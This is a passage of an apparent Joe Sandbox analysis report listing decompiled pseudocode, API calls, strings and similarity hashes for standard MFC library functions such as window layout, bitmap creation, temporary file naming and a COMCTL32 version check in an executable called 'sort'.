				if(_t275 != 0) {
					_t177 = E004131DD(_t275 + _t275 * 4 << 2);
					_v8 = _t177;
					if(_t275 > 0) {
						_v12 = _t177;
						do {
							E0041C295(_t227, _t266, _v12);
							_v12 = _v12 + 0x14;
							_t266 = _t266 + 1;
						} while (_t266 < _t275);
						_t268 = 0;
						if(_t275 > 0) {
							_t179 =  *(_t227 + 0x64);
							if((_t179 & 0x00000002) == 0) {
								_t256 = _t179 & 0x00000004;
								_v44.bottom = _t256;
								if(_t256 == 0) {
									L19:
									_push(_t268);
									asm("sbb eax, eax");
									_t215 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t215;
									_push(_t215);
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t268);
										_push( *((intOrPtr*)(_t227 + 0x54)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t179 & 0x00000001;
													if((_t179 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v44);
													E0041F52D(_t227,  &_v44, _a8 & 0x00000002);
													_t224 = _a8 & 0x00000020;
													__eflags = _t224;
													if(_t224 == 0) {
														_t260 = _v44.right - _v44.left;
														__eflags = _t260;
													} else {
														_t260 = _v44.bottom - _v44.top;
													}
													_push(_t224);
													_push(_t260 + _a12);
												}
											} else {
												_push(0);
												_push(0);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t275);
								_push(_v8);
								E0041C6B2(_t227, _t263);
							}
							_push(_t275);
							_push(_v8);
							_push( &(_v44.right));
							_t181 = E0041C4B6(_t227);
							_v52 =  *_t181;
							_v48 =  *((intOrPtr*)(_t181 + 4));
							if((_a8 & 0x00000040) != 0) {
								 *(_t227 + 0x84) =  *(_t227 + 0x84) & 0x00000000;
								_v20 = _t268;
								_v44.bottom =  *(_t227 + 0x84);
								if(_t275 > 0) {
									_t250 = _t275;
									_t202 = _v8 + 4;
									_v24 = _t202;
									do {
										if(( *(_t202 + 5) & 0x00000001) != 0 &&  *_t202 != 0) {
											_t268 = _t268 + 1;
										}
										_t202 = _t202 + 0x14;
										_t250 = _t250 - 1;
									} while (_t250 != 0);
									if(_t268 > 0) {
										_t205 = E004131DD(_t268 + _t268 * 2 << 3);
										if(_t205 == 0) {
											_t205 = 0;
											__eflags = 0;
										} else {
											_a12 = _t268 - 1;
										}
										_v16 = _v16 & 0x00000000;
										_a12 = _a12 & 0x00000000;
										_v20 = _t205;
										_t67 = _t205 + 8; // 0x8
										_t272 = _t67;
										_t206 = _v24;
										_v12 = _t272;
										_v24 = _t206;
										do {
											if(( *(_t206 + 5) & 0x00000001) != 0 &&  *_t206 != 0) {
												_t252 = _a12;
												 *((intOrPtr*)(_t272 - 8)) = _t252;
												 *((intOrPtr*)(_t272 - 4)) =  *_t206;
												 *((intOrPtr*)( *_t227 + 0xe0))(_t252,  &_v68);
												E0041A32D(_t227,  &_v68);
												_v16 = _v16 + 1;
												asm("movsd");
												asm("movsd");
												_v12 = _v12 + 0x18;
												_t206 = _v24;
												asm("movsd");
												asm("movsd");
												_t275 = _v28;
												_t272 = _v12;
											}
											_a12 = _a12 + 1;
											_t206 = _t206 + 0x14;
											_v24 = _t206;
										} while (_a12 < _t275);
										_t268 = _v16;
									}
								}
								_t185 =  *(_t227 + 0x64);
								if((_t185 & 0x00000001) != 0 && (_t185 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t227 + 0x54)) = _v52;
								}
								_a12 = _a12 & 0x00000000;
								_t308 = _t275;
								if(_t275 > 0) {
									_v16 = _v8;
									do {
										E0041C2B4(_t227, _t308, _a12, _v16);
										_a12 = _a12 + 1;
										_v16 = _v16 + 0x14;
									} while (_a12 < _t275);
								}
								if(_t268 > 0) {
									_t187 = _v20;
									_v24 = _t268;
									_t113 = _t187 + 8; // 0x8
									_t279 = _t113;
									_a12 = _t279;
									do {
										_t188 = E0041649C(_t227,  *((intOrPtr*)(_t279 - 4)));
										_v28 = _t188;
										if(_t188 != 0) {
											GetWindowRect( *(_t188 + 0x1c),  &_v68);
											 *((intOrPtr*)( *_t227 + 0xe0))( *((intOrPtr*)(_a12 - 8)),  &_v68);
											E0041663D(_v28, 0, _v68.left -  *_t279 + _v68.left, _v68.top -  *((intOrPtr*)(_t279 + 4)) + _v68.top, 0, 0, 0x15);
											_t279 = _a12;
										}
										_t279 = _t279 + 0x18;
										_t130 =  &_v24;
										 *_t130 = _v24 - 1;
										_a12 = _t279;
									} while ( *_t130 != 0);
									E00413206(_v20);
								}
								 *(_t227 + 0x84) = _v44.bottom;
							}
							E00413206(_v8);
						}
					}
				}
				SetRectEmpty( &_v68);
				E0041F52D(_t227,  &_v68, _a8 & 0x00000002);
				_v48 = _v48 + _v68.top - _v68.bottom;
				_v52 = _v52 + _v68.left - _v68.right;
				_t232 = E0041E6BA( &(_v44.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t173 =  *_t232;
				_t233 =  *((intOrPtr*)(_t232 + 4));
				if(_v52 <= _t173) {
					_v52 = _t173;
				}
				if(_v48 <= _t233) {
					_v48 = _t233;
				}
				_t174 = _a4;
				 *_t174 = _v52;
				 *((intOrPtr*)(_t174 + 4)) = _v48;
				return _t174;
			}

APIs

SetRectEmpty.USER32(?), ref: 0041C8B7
GetWindowRect.USER32 ref: 0041CA5F
SetRectEmpty.USER32(?), ref: 0041CAD0

Strings

@, xrefs: 0041C924

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Empty$Window
String ID: @
API String ID: 444217639-2766056989
Opcode ID: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
Instruction ID: cf120915a9bc79257b06898680a609e4f39c2be92c1a3f6b3b2cd3709033a41d
Opcode Fuzzy Hash: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
Instruction Fuzzy Hash: 81C14771A40219AFCF15DFA8CC84AEEBBB5FF44354F04816AE815AB351D738AD81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418A76, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00418A76() {
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t64;
				intOrPtr* _t74;
				intOrPtr _t76;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t90;

				E00406520(E00429F80, _t78);
				_t35 =  *0x436980; // 0x436994
				_t55 =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t78 - 0x10)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t78 + 0x14)) = _t35;
				_t74 =  *((intOrPtr*)(_t78 + 0xc));
				 *(_t78 - 4) = 0;
				if(_t74 == 0) {
					L19:
					if( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x14)) - 8)) == 0) {
						_t90 =  *0x439c48; // 0x1
						_push(0x104);
						if(_t90 == 0) {
							lstrcpynA(_t78 - 0x114,  *(_t78 + 8), ??);
						} else {
							_push(_t78 - 0x114);
							_push( *(_t78 + 8));
							E00417CBF();
						}
						E0041E3FA(_t78 + 0x14, _t55, _t78 - 0x114);
					}
					E0041BB46( *((intOrPtr*)(_t78 + 0x14)), 0x30,  *((intOrPtr*)(_t78 - 0x10)));
					L25:
					 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
					_t38 = E00416AEC(_t78 + 0x14);
					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
					return _t38;
				}
				if(E00416753(_t74, 0x42d4d0) != 0) {
					goto L25;
				}
				if(E00416753(_t74, ?str?) == 0) {
					_t48 = E00416753(_t74, "H�B");
					__eflags = _t48;
					if(_t48 == 0) {
						goto L19;
					}
					_t49 =  *((intOrPtr*)(_t74 + 0x10));
					_t64 = _t74 + 0x10;
					__eflags =  *((intOrPtr*)(_t49 - 8));
					if( *((intOrPtr*)(_t49 - 8)) == 0) {
						E00416BE5(_t64,  *(_t78 + 8));
					}
					_t50 = E00416CC1(_t78 + 0x14, _t78, 0xff);
					__eflags =  *((intOrPtr*)( *_t74 + 0xc))(_t50, 0x100, _t78 - 0x10);
					if(__eflags == 0) {
						_t76 =  *((intOrPtr*)(_t74 + 8));
						__eflags = _t76 - 2;
						if(__eflags >= 0) {
							__eflags = _t76 - 3;
							if(__eflags <= 0) {
								_t55 = 0xf121;
							} else {
								__eflags = _t76 - 5;
								if(_t76 == 5) {
									__eflags =  *((intOrPtr*)(_t78 + 0x10));
									_t55 = (0 | __eflags != 0x00000000) + 0xf123;
								} else {
									__eflags = _t76 - 0xd;
									if(__eflags == 0) {
										_t55 = 0xf122;
									}
								}
							}
						}
					}
					E00416D10(_t78 + 0x14, __eflags, 0xffffffff);
				} else {
					_t77 =  *((intOrPtr*)(_t74 + 8));
					if(_t77 == 3 || _t77 > 4 && _t77 <= 7) {
						_t55 = 0xf120;
					}
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00418A7B
lstrcpynA.KERNEL32(?,?,00000104), ref: 00418BA1

Strings

HB, xrefs: 00418AEF
pB, xrefs: 00418ABB

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: H_prologlstrcpyn
String ID: HB$pB
API String ID: 588646068-605489205
Opcode ID: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
Instruction ID: a9f5f5579fdfe236bfe92a05d823b87aef4f8825b77d1c3b985387d1bf5da384
Opcode Fuzzy Hash: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
Instruction Fuzzy Hash: EF419D71A0421A9BCF21EF55C8819EEB3A5EF04354F11412FF866A71E0EB38AD80CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00416FCD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00416FCD(void** __ecx, char* _a4, short _a8) {
				signed int _v8;
				void** _v12;
				signed int _v16;
				short* _v20;
				short _v84;
				signed int _t47;
				signed int _t48;
				void* _t61;
				signed int* _t67;
				void* _t75;
				signed int _t81;
				short* _t84;
				signed int _t86;
				signed int _t93;
				void** _t94;
				void* _t96;

				_v12 = __ecx;
				if(__ecx[1] != 0) {
					_t67 = GlobalLock( *__ecx);
					_t47 = _t67[0];
					_v8 = 0 | _t47 == 0x0000ffff;
					if(_t47 != 0xffff) {
						_t48 =  *_t67;
					} else {
						_t48 = _t67[3];
					}
					asm("sbb esi, esi");
					_v16 = _t48 & 0x00000040;
					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
					if(_v8 == 0) {
						 *_t67 =  *_t67 | 0x00000040;
					} else {
						_t67[3] = _t67[3] | 0x00000040;
					}
					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
					_t84 = E00416E50(_t67);
					_t75 = 0;
					_v20 = _t84;
					if(_v16 != 0) {
						_t22 = E00406A48(_t84 + _t93) * 2; // 0x3
						_t75 = _t93 + _t22 + 2;
					}
					_t26 = _t84 + 3; // 0x6
					_t55 = _t75 + _t26 & 0x000000fc;
					_v16 = _t75 + _t26 & 0x000000fc;
					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
					if(_v8 == 0) {
						_t81 = _t67[2];
					} else {
						_t81 = _t67[4];
					}
					if(_a4 != _t75 && _t81 > 0) {
						E00405EA0(_t86, _t55, _t67 - _t55 + _v12[1]);
						_t96 = _t96 + 0xc;
					}
					 *_v20 = _a8;
					E00405EA0(_v20 + _t93,  &_v84, _a4 - _t93);
					_t94 = _v12;
					_t94[1] = _t94[1] + _t86 - _v16;
					GlobalUnlock( *_t94);
					_t94[2] = _t94[2] & 0x00000000;
					_t61 = 1;
					return _t61;
				}
				return 0;
			}

APIs

GlobalLock.KERNEL32 ref: 00416FE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0041703C
GlobalUnlock.KERNEL32(?), ref: 004170D3

Strings

System, xrefs: 00416FD3

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Global$ByteCharLockMultiUnlockWide
String ID: System
API String ID: 231414890-3470857405
Opcode ID: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
Instruction ID: c2f8acceaa533c94d1390ef28e6fe5bddd73ae44c4aad8fbd6ca481d2bb84418
Opcode Fuzzy Hash: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
Instruction Fuzzy Hash: 9741E872904305EFCB10DFA4C8859EF7BB5FF44354F50816AE815AB284D3399A86CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004227B5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004227B5(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x6c)) == 0) {
					L6:
					if(( *(_t71 + 0x64) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0x0000002f | 0x00000020;
						}
					}
					_t74 = E004225E5(_v8, _t77, _a16);
					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *((intOrPtr*)(_t74 + 0x20)) == 0) {
						_t29 = _t71 + 0x1c; // 0x9630a380
						 *((intOrPtr*)(_t74 + 0x20)) =  *_t29;
					}
					E0041D196(E0041649C(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					_t32 = _t71 + 0x1c; // 0x9630a380
					_t42 = GetWindowLongA( *_t32, 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E0041668C(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t4 = _t71 + 0x70; // 0xc8b8c35e
				_t76 =  *_t4;
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x78)) == 0 || E0041D12E(_t76) != 1 || ( *(_t76 + 0x64) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E00413740(_t77, GetParent( *(_t76 + 0x1c)));
					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					goto L13;
				}
			}

APIs

GetParent.USER32(?), ref: 004227EF

Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664

GetWindowLongA.USER32 ref: 0042288C
UpdateWindow.USER32(?), ref: 004228A5

Strings

P, xrefs: 0042282A

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$LongParentUpdate
String ID: P
API String ID: 1906497633-3110715001
Opcode ID: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
Instruction ID: 4478c7b2db2806f657cab283070aca1dc542ec48e340ed71b02adf3b0aace616
Opcode Fuzzy Hash: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
Instruction Fuzzy Hash: C631F371700614BFDB21AF25DD48BAF7BA8FF04704F40062AF9015A2A1CB79EC51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004244A1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004244A1(void* __edx) {
				signed char* _v8;
				char _v12;
				int _v16;
				void _v148;
				unsigned int _t20;
				int _t26;
				signed int _t36;
				struct HINSTANCE__* _t38;
				struct HBITMAP__* _t39;
				int _t41;
				unsigned int _t43;
				void* _t47;
				signed int* _t48;
				signed int _t53;
				signed int _t57;
				void* _t58;
				void* _t60;

				_t47 = __edx;
				_t20 = GetMenuCheckMarkDimensions();
				_t41 = _t20;
				_t43 = _t20 >> 0x10;
				_v16 = _t43;
				if(_t41 > 0x20) {
					_t41 = 0x20;
				}
				asm("cdq");
				_t57 = _t41 + 0xf >> 4;
				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
				if(_t53 > 0xc) {
					_t53 = 0xc;
				}
				_t26 = 0x20;
				if(_t43 > _t26) {
					_v16 = _t26;
				}
				E00406330( &_v148, 0xff, 0x80);
				_v8 = 0x42c00c;
				_t58 = _t57 + _t57;
				_v12 = 5;
				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
				do {
					_v8 =  &(_v8[1]);
					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
					_t48[0] = _t36;
					 *_t48 = _t36;
					_t48 = _t48 + _t58;
					_t16 =  &_v12;
					 *_t16 = _v12 - 1;
				} while ( *_t16 != 0);
				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
				 *0x439c30 = _t38;
				if(_t38 == 0) {
					_t39 = LoadBitmapA(_t38, 0x7fe3);
					 *0x439c30 = _t39;
					return _t39;
				}
				return _t38;
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 004244AD
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042455C
LoadBitmapA.USER32 ref: 00424574

Strings

, xrefs: 004244BC

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
Instruction ID: 209a20424c1af6e272a19c9ebc2633acba681278a5e608b332d2eb8150819f76
Opcode Fuzzy Hash: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
Instruction Fuzzy Hash: 39213A72F00225AFDB20DB78DC85BAEBBB4EB80304F454167E945EB282D7749A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E47A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040E47A(void* __ecx) {
				signed int _t22;
				signed char _t36;
				char* _t43;
				void* _t45;

				E00406520(E0042AE14, _t45);
				_t22 =  *(_t45 + 8) & 0x00000007;
				 *(__ecx + 4) = _t22;
				_t36 =  *(__ecx + 8) & _t22;
				if(_t36 != 0) {
					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
						E004067EC(0, 0);
					}
					_t52 = _t36 & 0x00000004;
					if((_t36 & 0x00000004) == 0) {
						__eflags = _t36 & 0x00000002;
						_t43 = "ios::failbit set";
						if((_t36 & 0x00000002) == 0) {
							_t43 = "ios::eofbit set";
						}
					} else {
						_t43 = "ios::badbit set";
					}
					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
					E00401AE0(_t45 - 0x1c, 0);
					E00401B90(_t45 - 0x1c, _t43, E00405A40(_t43));
					_push(_t45 - 0x1c);
					 *((intOrPtr*)(_t45 - 4)) = 0;
					E0040E516(_t45 - 0x38, _t52);
					 *((intOrPtr*)(_t45 - 0x38)) = 0x42f8c4;
					_t22 = E004067EC(_t45 - 0x38, 0x433890);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t22;
			}

APIs

__EH_prolog.LIBCMT ref: 0040E47F

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

Strings

ios::badbit set, xrefs: 0040E4AC
ios::eofbit set, xrefs: 0040E4BD, 0040E4D1, 0040E4D9
ios::failbit set, xrefs: 0040E4B6

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
Instruction ID: 058c2687817cbb3025356127984514509d88e2cf1c36159cda0efedd272f4144
Opcode Fuzzy Hash: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
Instruction Fuzzy Hash: E41173B2D015196EC700EBA2D891AEEB778AF04358F44847BF41677282D77C5919CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00418BE2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418BE2(void* __eflags) {
				intOrPtr _t22;
				intOrPtr _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				E00406520(E00429FAB, _t47);
				_t22 =  *0x436980; // 0x436994
				 *((intOrPtr*)(_t47 - 0x14)) = 0;
				 *((intOrPtr*)(_t47 - 0x10)) = _t22;
				_t45 = 1;
				 *((intOrPtr*)(_t47 - 4)) = _t45;
				GetFullPathNameA( *(_t47 + 0xc), 0x104, _t47 - 0x118, _t47 + 0xc);
				 *( *(_t47 + 0xc)) = 0;
				GetTempFileNameA(_t47 - 0x118, "MFC", 0, E00416CC1(_t47 - 0x10, _t47, 0x105));
				E00416D10(_t47 - 0x10, _t52, 0xffffffff);
				if( *((intOrPtr*)(_t47 + 0x10)) == 0) {
					E00417B0B( *((intOrPtr*)(_t47 - 0x10)));
				}
				E00416861( *((intOrPtr*)(_t47 + 8)), _t47 - 0x10);
				 *((intOrPtr*)(_t47 - 0x14)) = _t45;
				 *((char*)(_t47 - 4)) = 0;
				E00416AEC(_t47 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return  *((intOrPtr*)(_t47 + 8));
			}

APIs

__EH_prolog.LIBCMT ref: 00418BE7
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40

Part of subcall function 00416D10: lstrlenA.KERNEL32(00000000,?,00416FC8,000000FF,?,00411ED7,?,?,?,0003C000,00000010,00000000,?,?), ref: 00416D23

Part of subcall function 00417B0B: DeleteFileA.KERNEL32(?), ref: 00417B0F
Part of subcall function 00417B0B: GetLastError.KERNEL32(00000000), ref: 00417B1A

Strings

MFC, xrefs: 00418C3A

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
String ID: MFC
API String ID: 501224598-3472178984
Opcode ID: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
Instruction ID: 106d24b416a7ad35a8895af97b87cb9fb89e8d85cfd421907a0314e2615bf241
Opcode Fuzzy Hash: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
Instruction Fuzzy Hash: 90114FB1A01219EFCF00EF94DC819EEB778FF04354F01456AF925A7290DB749A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042514B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0042514B() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x43687c; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E00406330( &_v24, 0, 0x14);
					_v24 = 0x14;
					_push( &_v24);
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x43687c = _t19;
				return _t19;
			}

0x00425151
0x00425159
0x004251b8
0x004251b8
0x00425174
0x00425176
0x0042517d
0x00425187
0x00425192
0x00425199
0x0042519e
0x004251ab
0x004251ab
0x0042519e
0x004251ad
0x00000000

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,004036DA,?,?,004036DA,?,00000800,50402834,?,?,0000E800,?), ref: 00425162
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0042516E

Strings

DllGetVersion, xrefs: 00425168
COMCTL32.DLL, xrefs: 0042515D

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
Instruction ID: 98511304bc6decc3b615f85e9ad6552c3d683fa4d8a624641396a172b3716892
Opcode Fuzzy Hash: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
Instruction Fuzzy Hash: 61F04FB1F013396BE71097E9AC45BAA77A89B08754F910532EA10F3290E6B4D90487F9

Uniqueness

Uniqueness Score: -1.00%

